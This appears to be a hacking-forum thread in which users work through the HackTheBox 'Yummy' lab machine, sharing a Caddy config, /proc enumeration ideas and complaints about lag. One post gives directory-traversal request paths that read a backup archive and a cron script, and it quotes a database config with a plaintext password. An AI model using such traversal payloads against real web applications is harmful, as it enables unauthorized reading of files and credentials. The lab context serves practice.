Possibly Related Threads…

Pepperwhite · Oct 05, 2024, 08:14 PM

Okay so we know a Caddy web server is being ran, we can get the caddyfile from /etc/caddy/Caddyfile. We just need to find a config file that would leak more info to get credentials or something.

hackemall · Oct 05, 2024, 08:33 PM

:80 {
@ip {
header_regexp Host ^(\d{1,3}\.){3}\d{1,3}$
}
redir @ip http://yummy.htb{uri}
reverse_proxy 127.0.0.1:3000 {
header_down -Server
}
}

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

peRd1 · (This post was last modified: Oct 05, 2024, 08:35 PM by peRd1.)

(Oct 05, 2024, 08:33 PM)hackemall Wrote: :80 {
@ip {
header_regexp Host ^(\d{1,3}\.){3}\d{1,3}$
}
redir @ip http://yummy.htb{uri}
reverse_proxy 127.0.0.1:3000 {
header_down -Server
}
}

Yes, this is the /etc/caddy/Caddyfile.

You can also get PIDs by fuzzing /proc/, etc.

Pepperwhite · Oct 05, 2024, 08:36 PM

Honestly it might come down to enumerating PIDs /proc/<pid>/cmdline one by one but since you have to manually intercept the request to test a file, it's such a hassle.

hackemall · Oct 05, 2024, 08:38 PM

i think something wrong with this machine it keeps droping on me

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

celsius · Oct 05, 2024, 08:40 PM

can't even display a dashboard with the table I booked
- reseted the machine
- registered another user
- cleared firefox cache, data and passwords
- created multiple table booking

nothing, does somebody else has the same issue ?

rootme1122 · Oct 05, 2024, 08:42 PM

(Oct 05, 2024, 08:40 PM)celsius Wrote: can't even display a dashboard with the table I booked
- reseted the machine
- registered another user
- cleared firefox cache, data and passwords
- created multiple table booking

nothing, does somebody else has the same issue ?

yes there is some issses i think same m facing

mamadoubarla · Oct 05, 2024, 08:51 PM

(Oct 05, 2024, 08:40 PM)celsius Wrote: can't even display a dashboard with the table I booked
- reseted the machine
- registered another user
- cleared firefox cache, data and passwords
- created multiple table booking

nothing, does somebody else has the same issue ?

machine is very very laggy, this is not even fun.

hackemall · Oct 05, 2024, 08:53 PM

no one got first blood something is wrong for sure

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

sedlyf · (This post was last modified: Oct 05, 2024, 09:02 PM by sedlyf.)

Hint : Explore /etc/crontab

/export/../../../../../../var/www/backupapp.zip

Quote:/export/../../../../../..///data/scripts/table_cleanup.sh

db_config = {

    'host': '127.0.0.1',

    'user': 'chef',

    'password': '3wDo7gSRZIwIHRxZ!',

    'database': 'yummy_db',

    'cursorclass': pymysql.cursors.DictCursor,

    'client_flag': CLIENT.MULTI_STATEMENTS

}

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,189	2 hours ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,495	Yesterday, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	398	Yesterday, 10:36 PM Last Post: op334
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	369	92,015	Yesterday, 04:10 PM Last Post: sabbyahmed
	CBBH Write Ups	hiddenhacker	22	6,229	Yesterday, 06:39 AM Last Post: Usercomplex